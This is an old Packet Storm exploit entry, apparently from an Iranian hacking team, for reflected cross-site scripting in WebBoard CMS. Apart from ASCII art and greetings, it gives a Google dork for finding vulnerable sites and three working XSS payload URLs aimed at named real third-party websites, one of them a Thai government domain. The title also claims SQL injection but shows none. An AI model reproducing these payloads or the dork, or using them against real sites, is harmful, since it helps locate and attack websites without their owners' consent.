WebBoard CMS Cross Site Scripting

2014-05-28T00:00:00
ID PACKETSTORM:126841
Type packetstorm
Reporter IeDb
Modified 2014-05-28T00:00:00

Description

                                        
                                            `  
` `. ,;\' /  
`. ,\'/ .\'  
`. X /.\'  
.-;--\'\'--.._` ` (  
.\' / `  
, IeDb.ir ` \' Q \'  
, , `._ \\  
,.| \' `-.;_\'  
: . ` ; ` ` --,.._;  
\' ` , ) .\'  
`._ , \' /_  
; ,\'\'-,;\' ``-  
``-..__``--`  
  
#################################  
  
# Exploit Title : WebBoard CMS Multiple Vulnerability  
  
# Author : IeDb Security Team  
  
# Discovered By : Bl4ck M4n  
  
# Home : http://www.iedb.ir/acc  
  
# Security Risk : High  
  
# Tested on : Linux / xp / vista /  
  
# Dork : inurl: webboard_view.php?qid=  
  
#################################  
Exploit (Xss And Sql Injection) :  
  
http://www.tweecholbotanicgarden.com/webboard_view.php?qid=44%22%3E%3Cscript%3Eprompt%28/Bl4ck%20M4n/%29%3C/script%3E  
http://www.saira.go.th/webboard/view.php?No=71%22%3E%3Cscript%3Eprompt%28/Bl4ck%20M4n/%29%3C/script%3E  
http://studydroid.com/printerFriendlyViewPack.php?packId=223483%22%3E%3Cscript%3Eprompt%28/Bl4ck%20M4n/%29%3C/script%3E  
  
  
#################################  
  
Yahoo.joker_s_hack_s@yahoo.com  
  
  
#################################  
  
# Greats : Amir ! Bl4ck N3T ! joker_s ! ErfanMs ! Security ! ExTr4 ! MrHS3c ! z3r0 ! Mr.Time ! E1.Coders ! enddo  
  
# & All Members In IrIsT.Ir / iedb.ir  
  
#################################  
#  
# @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@@@@@  
# @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@@@  
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@  
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@  
# @@@ @@@@@@@@@@@ @@@ @ @@@@@@@@@@ @@@ @@@@@@  
# @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@  
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@  
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@  
# @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@ @@@ @@@  
#  
#####################################  
`